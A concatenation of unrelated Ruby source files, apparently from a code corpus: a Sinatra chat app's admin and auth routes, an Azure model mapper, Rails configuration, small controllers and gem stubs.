if $production
JS_CACHE['core'] = Uglifier.compile(data.join(';'), {:squeeze => false})
JS_CACHE['core']
else
data
end
end
helpers do
include Rack::Utils
alias_method :h, :escape_html
def partial(page, options={})
erb page, options.merge!(:layout => false)
end
def link_to(name, href, options={})
opts = options.keys.map { |key| "#{key}=\"#{options[key]}\"" }.join(' ')
"<a href=\"#{escape_html(href)}\" #{opts}>#{name}</a>"
end
def get_channels
@channels ||= Channel.all
end
def get_admin_channels
current_user.admin ? get_channels : current_user.admin_channels
end
def public_tabs
get_channels.map do |channel|
{:id => "chan_#{channel.id}".to_sym, :class => 'room', :name => channel.permalink, :href => channel.permalink}
end
end
def admin_tabs
list = [{:id => :"admin", :class => 'admin', :name => 'Admin', :url => '/admin'}]
if current_user.admin
list += [{:id => :"admin_users", :class => 'admin', :name => 'Users', :url => '/admin/users'},
{:id => :"admin_bans", :class => 'admin', :name => 'Bans', :url => '/admin/bans'},
{:id => :"admin_channels", :class => 'admin', :name => 'Channels', :url => '/admin/channels'}]
end
list += get_admin_channels.map do |channel|
{:id => :"chan_#{channel.id}", :class => 'room', :name => channel.permalink, :url => "/admin/channels/#{channel.id}"}
end
list
end
def set_tab(the_tab)
@current_tab = the_tab
end
def get_tabs(list)
current = @current_tab
send(list).map do |tab|
"<li id=\"tab_#{tab[:id]}\" class=\"#{tab[:class]}\"><a href=\"#{tab[:url]}\" #{current == tab[:id] ? 'class="active"' : ''}>#{escape_html tab[:name]}</a></li>"
end.join('')
end
def channel_port(channel)
if APP_CONFIG['single_server']
# Determine from config
APP_CONFIG['websocket_port'] || ENV['PORT']
else
# Determine from channel info
channel.backend_server
end
end
end
get '/' do
@channels = Channel.all
erb :channel_index
end
# Global channel display
get '/r/:id' do
# Display the first channel for now
@channel = Channel.find_by_id(params[:id])
if @channel.nil?
status 404
halt
else
erb :channel
end
end
get '/all.js' do
content_type 'application/javascript'
if $production and JS_CACHE.has_key?('last_all_time')
last_modified(JS_CACHE['last_all_time'])
else
JS_CACHE['last_all_time'] = Time.now.utc
end
render_javascript(JS_FILES)
end
# Login
get '/auth' do
erb :login
end
post '/auth' do
if params[:error]
render 'error'
else
# get token
@current_user = User.authenticate(params[:name], params[:password])
if @current_user
session[:user_id] = @current_user.id
redirect session[:return_to] || '/'
else
erb :error
end
end
end
# Token for socket identification
post '/auth/socket_token' do
data = JSON.parse(request.body.read) rescue {}
if current_user
current_user.generate_auth_token!
content_type :json
{:auth_token => current_user.auth_token}.to_json
else
content_type :json
{:name => session['name']}.to_json
end
end
# Remember nick
post '/auth/name' do
data = JSON.parse(request.body.read) rescue {}
content_type :json
session[:name] = data['name'] if data['name']
{}.to_json
end
# Admin panel
get '/admin*' do
login_required
return status(401) if !current_user.admin
if params[:splat].first =~ /\/?(.*)$/
@subpath = $1[-1] == '/' ? $1[0...-1] : $1
end
erb :admin, :layout => :'admin_layout'
end
# Enumerate connections, videos, ban count, historical figures, etc
get '/stats' do
login_required
return status(401) if !current_user.admin
content_type :json
{
:subscriptions => SUBSCRIPTIONS.stats_enumerate,
:channels => Channel.all.map(&:stats_enumerate)
}.to_json
end
# Get users
get '/users' do
login_required
return status(401) if !current_user.admin
content_type :json
User.all.map{|u| u.to_info(:admin => true)}.to_json
end
# Create a user
post '/users' do
login_required
return status(401) if !current_user.admin
content_type :json
user = User.new(JSON.parse(request.body.read))
user.updated_by = current_user
if user.save
status 201
user.to_info(:admin => true).to_json
else
status 422
{:error => 'InvalidAttributes', :errors => user.errors}.to_json
end
end
# Get user info
get '/users/:id' do
login_required
return status(401) if !current_user.admin and current_user.id != params[:id].to_i
content_type :json
user = User.find_by_id(params[:id])
if user
user.to_info(:admin => true).to_json
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Update a user
put '/users/:id' do
login_required
return status(401) if !current_user.admin and current_user.id != params[:id].to_i
content_type :json
user = User.find_by_id(params[:id])
if user
user.updated_by = current_user
if user.update_attributes(JSON.parse(request.body.read))
user.to_info(:admin => true).to_json
else
status 422
{:error => 'InvalidAttributes', :errors => user.errors}.to_json
end
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Delete a user
delete '/users/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
user = User.find_by_id(params[:id])
if user
if user != current_user && User.all.count > 1
user.destroy
else
status 406
{:error => 'EndOfWorld'}.to_json
end
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Get bans
get '/bans' do
login_required
return status(401) if !current_user.admin
content_type :json
Ban.all.map(&:to_info).to_json
end
# Get a ban
get '/bans/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
ban = Ban.find_by_id(params[:id])
if ban
ban.to_info(:admin => true).to_json
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Update bans
put '/bans/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
ban = Ban.find_by_id(params[:id])
if ban
if ban.update_attributes(JSON.parse(request.body.read))
ban.to_info(:admin => true).to_json
else
status 422
{:error => 'InvalidAttributes', :errors => ban.errors}.to_json
end
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Create a ban
post '/bans' do
login_required
return status(401) if !current_user.admin
content_type :json
ban = Ban.new(JSON.parse(request.body.read))
if ban.save
status 201
ban.to_info(:admin => true).to_json
else
status 422
{:error => 'InvalidAttributes', :errors => ban.errors}.to_json
end
end
# Delete a ban
delete '/bans/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
ban = Ban.find_by_id(params[:id])
if ban
ban.destroy
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Create a channel
post '/channels' do
login_required
return status(401) if !current_user.admin
content_type :json
channel = Channel.new(JSON.parse(request.body.read))
if channel.save
status 201
channel.to_info(:admin => true).to_json
else
status 422
{:error => 'InvalidAttributes', :errors => channel.errors}.to_json
end
end
# List channels
get '/channels' do
login_required
content_type :json
Channel.all.map{|c|c.to_info(:full => true)}.to_json
end
# Get channel info
get '/channels/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
channel = Channel.find_by_id(params[:id])
if channel
channel.to_info(:admin => true).to_json
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Update channel info
put '/channels/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
channel = Channel.find_by_id(params[:id])
if channel and channel.can_admin(current_user)
if channel.update_attributes(JSON.parse(request.body.read))
channel.to_info(:admin => true).to_json
else
status 422
{:error => 'InvalidAttributes', :errors => channel.errors}.to_json
end
else
{:error => 'NotFound'}
end
end
# Delete a channel
delete '/channels/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
channel = Channel.find_by_id(params[:id])
if channel
channel.destroy
else
status 404
{:error => 'NotFound'}.to_json
end
end
end
| 23.093126 | 168 | 0.597888 |
bb0369eddc43f337c57c34d3762cd2f5a6d31289 | 1,396 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DevTestLabs::Mgmt::V2018_09_15
module Models
#
# Represents an update resource
#
class UpdateResource
include MsRestAzure
# @return [Hash{String => String}] The tags of the resource.
attr_accessor :tags
#
# Mapper for UpdateResource class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'UpdateResource',
type: {
name: 'Composite',
class_name: 'UpdateResource',
model_properties: {
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
}
}
}
}
end
end
end
end
| 25.851852 | 70 | 0.49212 |
7ac80d3cc0919a17348c45d19e7658072f304130 | 1,759 | Rails.application.configure do
# Settings specified here will take precedence over those in
# config/application.rb.
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
config.cache_classes = true
# Do not eager load code on boot. This avoids loading your whole application
# just for the purpose of running a single test. If you are using a tool that
# preloads Rails for running tests, you may have to set it to true.
config.eager_load = false
# Configure static file server for tests with Cache-Control for performance.
config.serve_static_files = true
config.static_cache_control = 'public, max-age=3600'
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Raise exceptions instead of rendering exception templates.
config.action_dispatch.show_exceptions = false
# Disable request forgery protection in test environment.
config.action_controller.allow_forgery_protection = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
# Randomize the order test cases are executed.
config.active_support.test_order = :random
# Print deprecation notices to the stderr.
config.active_support.deprecation = :stderr
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
end
| 39.977273 | 79 | 0.773735 |
b9f9242fdeeacd9523031fac18fc6dac3dfc1e93 | 432 | # frozen_string_literal: true
class LikesController < ApplicationController
before_action :set_cart
before_action :dish_params
def create
Like.create(user_id: current_user.id, dish_id: params[:id])
end
def destroy
Like.find_by(user_id: current_user.id, dish_id: params[:id]).destroy
end
private
def dish_params
@dish = Dish.find(params[:id])
end
def set_cart
@cart = current_cart
end
end
| 17.28 | 72 | 0.724537 |
b928e0e4c736d9822758c7a67c776b6049d25ac1 | 75 | require "overkill/version"
module Overkill
# Your code goes here...
end
| 12.5 | 26 | 0.733333 |
11548f238d7b9d1c5482215a3988a34bad693740 | 465 | OpenFarm::Application.configure do
Delayed::Worker.delay_jobs = false
config.cache_classes = false
config.eager_load = false
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
config.action_mailer.raise_delivery_errors = false
config.active_support.deprecation = :log
config.assets.debug = true
config.quiet_assets = true
config.action_mailer.default_url_options = { :host => 'localhost:3000' }
end
| 35.769231 | 74 | 0.780645 |
796a9dfc1cda03f4e629411165a2470c3f605248 | 688 | module FanOut
class InsertAllWithSelectBuilder
attr_reader :attributes, :select_scope, :model, :connection
def initialize(model, attributes, select_scope, connection)
@model = model
@attributes = attributes
@select_scope = select_scope
@connection = connection
end
def into
"INTO #{model.quoted_table_name} (#{columns_list})"
end
def values_list
select_scope.to_sql
end
def returning
nil
end
def skip_duplicates?
true
end
def conflict_target
''
end
private
def columns_list
attributes.map(&connection.method(:quote_column_name)).join(", ")
end
end
end
| 17.641026 | 71 | 0.648256 |
ac47fea7372e9a01e7867800e8f1e8cd605cdf52 | 1,275 | #
# Be sure to run `pod spec lint LaravelEchoIOS.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
s.name = "LaravelEchoIOS"
s.version = "0.0.3"
s.summary = "A wrapper for Laravel Echo in Swift"
s.description = "A wrapper for Laravel Echo with Socket.io in Swift by bubbleflat.com"
s.homepage = "https://github.com/val-bubbleflat/laravel-echo-ios"
s.license = { :type => "MIT", :file => "LICENSE"}
s.author = { "Valentin Vivies" => "[email protected]", "bubbleflat" => "[email protected]" }
s.source = { :git => "https://github.com/val-bubbleflat/laravel-echo-ios.git", :tag => "#{s.version}" }
s.platforms = {:ios => "9.0"}
s.source_files = "LaravelEchoIOS/*.swift", "LaravelEchoIOS/**/*.swift"
s.exclude_files = ""
s.pod_target_xcconfig = { 'SWIFT_VERSION' => '4.0' }
s.subspec 'Socket.IO-Client-Swift' do |socket|
socket.dependency 'Socket.IO-Client-Swift'
end
#s.framework = "LaravelEchoIOS"
end
| 33.552632 | 111 | 0.661176 |
5da1bed22952ec9b2e590d4ca23fa18d27937e28 | 345 | # frozen_string_literal: true
class ApplicationPolicy
attr_reader :user, :record
def initialize(user, record)
@user = user
@record = record
end
def index?
true
end
def create?
true
end
def new?
create?
end
def update?
true
end
def edit?
update?
end
def destroy?
true
end
end
| 9.857143 | 30 | 0.614493 |
ed395dd5df8497a5e2937568a0f958f8c41e7234 | 643 | require 'spec_helper'
RSpec.describe SuapApi do
it 'should return correct "BASE_URL"' do
expect(SuapApi::BASE_URL).to eq('https://suap.ifms.edu.br')
expect(SuapApi::BASE_URL).not_to be nil
end
it 'should return correct uri "FREQUENCY_OF_DAY"' do
uri = '/api/v2/minhas-informacoes/minhas-frequencias/?format=json'
expect(SuapApi::FREQUENCY_OF_DAY).to eq(uri)
expect(SuapApi::FREQUENCY_OF_DAY).not_to be nil
end
it 'should return correct uri "MY_DATA"' do
uri = '/api/v2/minhas-informacoes/meus-dados/?format=json'
expect(SuapApi::MY_DATA).to eq(uri)
expect(SuapApi::MY_DATA).not_to be nil
end
end
| 30.619048 | 70 | 0.720062 |
0132a7999995d7770f280ae581ef6beb3a958ee2 | 319 | require 'test_helper'
class MainControllerTest < ActionController::TestCase
test "should get create" do
get :create
assert_response :success
end
test "should get list" do
get :list
assert_response :success
end
test "should get view" do
get :view
assert_response :success
end
end
| 15.95 | 53 | 0.705329 |
01570f93c127a3c71e6e5555187313b4fbecd058 | 440 | module Twitter
module Endpoints
module CustomToken
def request
@request
end
def call(env)
@request = Rack::Request.new(env)
response = Simple::OAuth2::Generators::Token.generate_for(env, &:unsupported_grant_type!)
status = response.status
headers = response.headers
body = JSON.generate(response.body)
[status, headers, [body]]
end
end
end
end
| 20 | 97 | 0.613636 |
91228004e2e7a5c12a9aa1653cf215c6e39e653d | 1,986 | # Unlight
# Copyright(c)2019 CPA
# This software is released under the MIT License.
# http://opensource.org/licenses/mit-license.php
module Unlight
# パーツのインベントリクラス
class ItemInventory < Sequel::Model
# 他クラスのアソシエーション
many_to_one :avatar # アバターを持つ
many_to_one :avatar_item # アバターアイテムを持つ
plugin :schema
plugin :validation_class_methods
plugin :hook_class_methods
# スキーマの設定
set_schema do
primary_key :id
integer :avatar_id, :index=>true #, :table => :avatars
integer :avatar_item_id#, :table => :avatar_items
integer :state, :default => 0 # ITEM_STATE_NOT_USE
integer :server_type, :default => 0 # tinyint(DB側で変更) 新規追加 2016/11/24
datetime :use_at
datetime :created_at
datetime :updated_at
end
# バリデーションの設定
validates do
end
# DBにテーブルをつくる
if !(ItemInventory.table_exists?)
ItemInventory.create_table
end
# テーブルを変更する(履歴を残せ)
DB.alter_table :item_inventories do
add_column :server_type, :integer, :default => 0 unless Unlight::ItemInventory.columns.include?(:server_type) # 新規追加 2016/11/24
end
# インサート時の前処理
before_create do
self.created_at = Time.now.utc
end
# インサートとアップデート時の前処理
before_save do
self.updated_at = Time.now.utc
end
# アイテム使用時の処理
def use(avt,quest_map_no=0)
ret = ERROR_ITEM_NOT_EXIST
# 重たい処理が走るとアイテムが何度も使えるので最初に
if self.state == ITEM_STATE_NOT_USE
if self.avatar_item.duration > 0
self.state = ITEM_STATE_USING # 使用中
self.use_at = Time.now.utc # 使用時間
else
self.state = ITEM_STATE_USED # 使用した
self.use_at = Time.now.utc # 使用時間
end
self.save_changes
ret = self.avatar_item.use(avt,quest_map_no)
if ret != 0
self.state = ITEM_STATE_NOT_USE # 未使用に戻す
self.save_changes
end
end
ret
end
end
end
| 25.139241 | 134 | 0.633938 |
629d3301f03951017626b3d9579c6ed321b61643 | 52 | class MessageController < ApplicationController
end
| 17.333333 | 47 | 0.884615 |
8748e3c6cd5802e000a65bf1f1fa7162ef89f500 | 141 | module Types
class ReferencesType < BaseObject
field :users, [UserType], null: true
field :votes, [VoteType], null: true
end
end
| 20.142857 | 40 | 0.695035 |
1a663cf9afa911558c258872792f5e6dc4a6c3f1 | 174 | require 'test_helper'
class UsersControllerTest < ActionDispatch::IntegrationTest
# test "should get new" do
# get users_new_url
# assert_response :success
# end
end
| 19.333333 | 59 | 0.764368 |
2809f192767619f316d996070cfcba167499375c | 767 | require 'common'
module Sykus; module Hosts
# Gets client host info (printers + roomctl screenlock).
class GetCliInfo < ServiceBase
# @param [IPAddr] ip Client IP.
# @return [Hash] Hash of client info.
def run(ip)
host = Host.first(ip: ip)
raise Exceptions::Input, 'Host not found' if host.nil?
printers = host.host_group.printers.map do |printer|
{
id: "p#{printer.id}",
name: printer.name.gsub(' ', '-').gsub('/', '-').gsub('#', '')
}
end
data = { printers: printers }
%w{screenlock printerlock weblock soundlock}.each do |lock|
data[lock.to_sym] =
!!REDIS.get("Roomctl.#{host.host_group.id}.#{lock}")
end
data
end
end
end; end
| 22.558824 | 72 | 0.569752 |
bf2f912e884f82debf181a8a9f8cd4afa4913dcf | 1,814 | require File.expand_path(File.dirname(__FILE__) + '/../example_helper')
describe Astrails::Safe::Archive do
def def_config
{
:options => "OPTS",
:files => "apples",
:exclude => "oranges"
}
end
def archive(id = :foo, config = def_config)
Astrails::Safe::Archive.new(id, Astrails::Safe::Config::Node.new(nil, config))
end
after(:each) { Astrails::Safe::TmpFile.cleanup }
describe :backup do
before(:each) do
@archive = archive
stub(@archive).timestamp {"NOW"}
end
{
:id => "foo",
:kind => "archive",
:extension => ".tar",
:filename => "archive-foo.NOW",
:command => "tar -cf - OPTS --exclude=oranges apples",
}.each do |k, v|
it "should set #{k} to #{v}" do
@archive.backup.send(k).should == v
end
end
end
describe :tar_exclude_files do
it "should return '' when no excludes" do
archive(:foo, {}).send(:tar_exclude_files).should == ''
end
it "should accept single exclude as string" do
archive(:foo, {:exclude => "bar"}).send(:tar_exclude_files).should == '--exclude=bar'
end
it "should accept multiple exclude as array" do
archive(:foo, {:exclude => ["foo", "bar"]}).send(:tar_exclude_files).should == '--exclude=foo --exclude=bar'
end
end
describe :tar_files do
it "should raise RuntimeError when no files" do
lambda {
archive(:foo, {}).send(:tar_files)
}.should raise_error(RuntimeError, "missing files for tar")
end
it "should accept single file as string" do
archive(:foo, {:files => "foo"}).send(:tar_files).should == "foo"
end
it "should accept multiple files as array" do
archive(:foo, {:files => ["foo", "bar"]}).send(:tar_files).should == "foo bar"
end
end
end | 27.074627 | 114 | 0.599228 |
6ae557e508c53beb472dafa6b8e71313811a736a | 693 | require 'rails/generators'
module NeditorRails
module Generators
class InstallGenerator < ::Rails::Generators::Base
source_root File.expand_path("../templates", __FILE__)
desc "This generator installs neditor custom config"
def add_custom_config
if File.exist?("app/assets/javascripts/neditor_custom_config.js")
js = File.read("app/assets/javascripts/neditor_custom_config.js")
insert_into_file "app/assets/javascripts/neditor_custom_config.js", js, :after => "neditor custom config\n"
else
copy_file "neditor_custom_config.js", "app/assets/javascripts/neditor_custom_config.js"
end
end
end
end
end
| 31.5 | 117 | 0.707071 |
8783099728cf9183603d042ed72c3e02bea8c69f | 272 | # frozen_string_literal: true
# Copyright 2015-2017, the Linux Foundation, IDA, and the
# CII Best Practices badge contributors
# SPDX-License-Identifier: MIT
%w[
.ruby-version
.rbenv-vars
tmp/restart.txt
tmp/caching-dev.txt
].each { |path| Spring.watch(path) }
| 20.923077 | 57 | 0.731618 |
11284145690367c02a5b4d7b5ca8f75b803c3026 | 1,483 | # frozen_string_literal: true
require "rails_helper"
RSpec.describe Api::V1::LightCompanySerializer, type: :serializer do
before(:all) {
@company = create :full_company
}
after(:all) {
@company.destroy!
}
before {
@company.reload
}
let(:serializer) { Api::V1::LightCompanySerializer.new(@company) }
let(:serialization) { ActiveModelSerializers::Adapter.create(serializer) }
let(:subject) { JSON.parse(serialization.to_json) }
it "includes the expected attributes" do
expect(subject.keys).to contain_exactly(
"id",
"smooth_name",
"name",
"website_url",
"api_url",
"city",
"country"
)
end
it { expect(subject["id"]).not_to be_nil }
it { expect(subject["name"]).not_to be_nil }
it { expect(subject["smooth_name"]).not_to be_nil }
it { expect(subject["website_url"]).not_to be_nil }
it { expect(subject["api_url"]).not_to be_nil }
it { expect(subject["country"]).not_to be_nil }
it { expect(subject["id"]).to eql(@company.id) }
it { expect(subject["name"]).to eql(@company.name) }
it { expect(subject["smooth_name"]).to eql(@company.smooth_name) }
it { expect(subject["website_url"]).to eql("https://www.companydata.co/companies/#{@company.slug}") }
it { expect(subject["api_url"]).to eql("https://www.companydata.co/api/v1/companies/#{@company.slug}") }
it { expect(subject["city"]).to eql(@company.city) }
it { expect(subject["country"]).to eql(@company.country) }
end
| 31.553191 | 106 | 0.66352 |
1d0cedc36213138da8cecd2b9462d98cd1f40563 | 582 | require 'bundler/setup'
require 'minitest/autorun'
require 'minitest/reporters'
require 'minitest/reporters/mean_time_reporter'
Minitest::Reporters.use! Minitest::Reporters::MeanTimeReporter.new
class TestClass < Minitest::Test
def test_assertion
assert true
end
def test_fail
fail
end
end
class AnotherTestClass < Minitest::Test
def test_assertion
assert true
end
def test_fail
fail
end
end
class LastTestClass < Minitest::Test
def test_assertion
assert true
end
def test_fail
fail
end
end
| 15.72973 | 67 | 0.701031 |
ff1ab14ad9c585f3202b3801d153226528b213f9 | 310 | class JobsController < ApplicationController
def fake
num = params[:num] || 200
num.to_i.times { FakeJob.perform_async }
render text: "#{num} jobs created"
end
def log
num = params[:num] || 200
num.to_i.times { LogJob.perform_async }
render text: "#{num} jobs created"
end
end
| 22.142857 | 44 | 0.654839 |
ab37c282fe57af1eaa62cdc6ad350393fdd54946 | 1,050 | # frozen_string_literal: true
module Types
module PermissionTypes
class Project < BasePermissionType
graphql_name 'ProjectPermissions'
abilities :change_namespace, :change_visibility_level, :rename_project,
:remove_project, :archive_project, :remove_fork_project,
:remove_pages, :read_project, :create_merge_request_in,
:read_wiki, :read_project_member, :create_issue, :upload_file,
:read_cycle_analytics, :download_code, :download_wiki_code,
:fork_project, :create_project_snippet, :read_commit_status,
:request_access, :create_pipeline, :create_pipeline_schedule,
:create_merge_request_from, :create_wiki, :push_code,
:create_deployment, :push_to_delete_protected_branch,
:admin_wiki, :admin_project, :update_pages,
:admin_remote_mirror, :create_label, :update_wiki, :destroy_wiki,
:create_pages, :destroy_pages, :read_pages_content
end
end
end
| 45.652174 | 81 | 0.680952 |
5d592a947bae83d1b176365dfc02fb9e10fcef5f | 239 | # frozen_string_literal: true
require_relative '../options_helper'
describe OctocatalogDiff::Cli::Options do
describe '#opt_truncate_details' do
include_examples 'true/false option', 'truncate-details', :truncate_details
end
end
| 23.9 | 79 | 0.786611 |
ede4fef7e6f48b7eac86adee43dc6aa3e7a10794 | 865 | require_relative '../lib/named_proc'
describe "proc" do
it "creates a new proc as usual when called with a block" do
a = proc{}
expect( a ).to be_instance_of Proc
expect( a ).not_to be_lambda
end
it "creates a named proc when a method gets called on it" do
a = proc.brawl{}
expect( a ).to be_a Proc
expect( a ).to be_instance_of NamedProc
expect( a ).not_to be_lambda
expect( a.name ).to eq :brawl
end
end
describe "lambda" do
it "creates a new lambda as usual when called with a block" do
a = lambda{}
expect( a ).to be_instance_of Proc
expect( a ).to be_lambda
end
it "creates a named lambda when a method gets called on it" do
a = lambda.brawl{}
expect( a ).to be_a Proc
expect( a ).to be_instance_of NamedProc
expect( a ).to be_lambda
expect( a.name ).to eq :brawl
end
end
| 25.441176 | 64 | 0.660116 |
f7bd6949145abbfc7b836adc12aa0f8532dd9a6c | 1,155 | Pod::Spec.new do |s|
s.name = "ISOLogger"
s.version = "0.1"
s.summary = "ISOLogger hides the existing log entries for your app. So you can focus on the ones you just added."
s.description = <<-DESC
Why ISOLogger?
--------------
Other people add log entries with only the best intentions. But sometimes they drown out your own voice.
The most useful entries are the ones you add yourself, right before you run the code.
ISOLogger is a simple tool that sends all existing log output to a file. It's still there if you need it. But your Xcode console is reserved so you can hear yourself think.
For a more detailed explanation, read the [blog post][1].
[1]: http://funroll.co/ "Introducing ISOLogger"
DESC
s.homepage = "https://github.com/funroll/ISOLogger"
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { "Peter Jenkins" => "[email protected]" }
s.source = { :git => "https://github.com/funroll/ISOLogger.git", :tag => "0.1" }
s.source_files = '*.{h,m}'
end
| 41.25 | 182 | 0.593939 |
b96ba76ef1e922f7bbfbd5ad75108de617bc7395 | 1,619 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::CognitiveServices::ContentModerator::V1_0
module Models
#
# Model object.
#
#
class CreateVideoReviewsBodyItemVideoFramesItemReviewerResultTagsItem
include MsRestAzure
# @return [String] Your key parameter.
attr_accessor :key
# @return [String] Your value parameter.
attr_accessor :value
#
# Mapper for
# CreateVideoReviewsBodyItemVideoFramesItemReviewerResultTagsItem class
# as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'CreateVideoReviewsBodyItem_VideoFramesItem_ReviewerResultTagsItem',
type: {
name: 'Composite',
class_name: 'CreateVideoReviewsBodyItemVideoFramesItemReviewerResultTagsItem',
model_properties: {
key: {
client_side_validation: true,
required: false,
serialized_name: 'Key',
type: {
name: 'String'
}
},
value: {
client_side_validation: true,
required: false,
serialized_name: 'Value',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 26.540984 | 95 | 0.56084 |
18714a4909baf212e5bdd58d97e21601e291a020 | 2,611 | ##
# $Id: gom_openurl.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'GOM Player ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in GOM Player 2.1.6.3499.
By sending an overly long string to the "OpenUrl()" method located
in the GomWeb3.dll Control, an attacker may be able to execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2007-5779'],
[ 'OSVDB', '38282'],
[ 'URL', 'http://secunia.com/advisories/27418/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP2 Pro English', { 'Ret' => 0x7e497c7b } ], # 10/29/07
],
'DisclosureDate' => 'Oct 27 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Randomize some things
vname = rand_text_alpha(rand(100) + 1)
strname = rand_text_alpha(rand(100) + 1)
# Set the exploit buffer
sploit = rand_text_english(506) + [target.ret].pack('V')
sploit << p.encoded + rand_text_english(1024 - p.encoded.length)
# Build out the message
content = %Q|
<html>
<object classid='clsid:DC07C721-79E0-4BD4-A89F-C90871946A31' id='#{vname}'></object>
<script language='javascript'>
var #{vname} = document.getElementById('#{vname}');
var #{strname} = new String('#{sploit}');
#{vname}.OpenURL(#{strname});
</script>
</html>
|
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end | 26.917526 | 88 | 0.595174 |
01d58c45ca1b92f77efb12d1b18da14812cbbb93 | 1,365 | require "spec_helper"
describe OpenXml::DrawingML::Properties::ColorSystemColor do
include PropertyTestMacros
it_should_use tag: :sysClr, name: "color_system_color", value: :activeBorder
it_should_have_value_properties :tint_transform, :shade_transform, :complement,
:inverse, :grayscale, :alpha_transform, :alpha_offset,
:alpha_modulation, :hue_transform, :hue_offset, :hue_modulation,
:saturation_transform, :saturation_offset, :saturation_modulation,
:luminance_transform, :luminance_offset, :luminance_modulation,
:red_transform, :red_offset, :red_modulation, :green_transform,
:green_offset, :green_modulation, :blue_transform, :blue_offset,
:blue_modulation, :gamma, :inverse_gamma, value: :activeBorder
for_attribute(:value) do
with_value(:activeBorder) do # Not exhaustive
it_should_assign_successfully :captionText
it_should_output_expected_xml :captionText
end
end
for_attribute(:last_color) do
with_value("AA0033") do
it_should_assign_successfully :captionText
it_should_output "<a:sysClr val=\"captionText\" lastClr=\"AA0033\"/>", :captionText
end
end
end
| 44.032258 | 100 | 0.649084 |
bb4a16c3fcda20e09a77cfbe64e874715e971d85 | 654 | require_relative '../dr.rb'
describe DigitalRoot do
it 'can find the digital root of 16' do
expect(DigitalRoot.calculate(16)).to eq(7)
end
it 'can find the digital root of 123' do
expect(DigitalRoot.calculate(123)).to eq(6)
end
it 'can find the digital root of 999' do
expect(DigitalRoot.calculate(999)).to eq(9)
end
it 'can find the digital root of 1' do
expect(DigitalRoot.calculate(1)).to eq(1)
end
it 'can find the digital root of 42342' do
expect(DigitalRoot.calculate(42342)).to eq(6)
end
it 'can find the digital root of 42383442' do
expect(DigitalRoot.calculate(42383442)).to eq(3)
end
end
| 21.8 | 52 | 0.69419 |
ab54e72cc10ecc819804bb6b3796ebedc415b751 | 94 | module EadIndexer
class Engine < ::Rails::Engine
isolate_namespace EadIndexer
end
end
| 15.666667 | 32 | 0.755319 |
bb4cc27cc29fe47ccfa6c1e5ec570431c8b9891e | 124 | TotalProfiler::Config.profile_all = true
TotalProfiler::Config.add_class String, [:split]
TotalProfiler::Base.monkeypatch!
| 24.8 | 48 | 0.814516 |
61a20d7a5c324f335453281fd15c1276f5810813 | 460 | cask 'keychaincheck' do
version '1.3'
sha256 '00da69cc12330a4f2b60e4e05714be5e51c48dde1727540cb9f5c523669ebed7'
# eclecticlightdotcom.files.wordpress.com was verified as official when first introduced to the cask
url 'https://eclecticlightdotcom.files.wordpress.com/2017/09/keychaincheck13a.zip'
name 'KeychainCheck'
homepage 'https://eclecticlight.co/'
depends_on macos: [:sierra, :high_sierra]
app 'keychaincheck13a/KeychainCheck.app'
end
| 32.857143 | 102 | 0.797826 |
038139b489c2e953032f2ac65598db2299719a66 | 2,105 | # frozen_string_literal: true
require 'rails_helper'
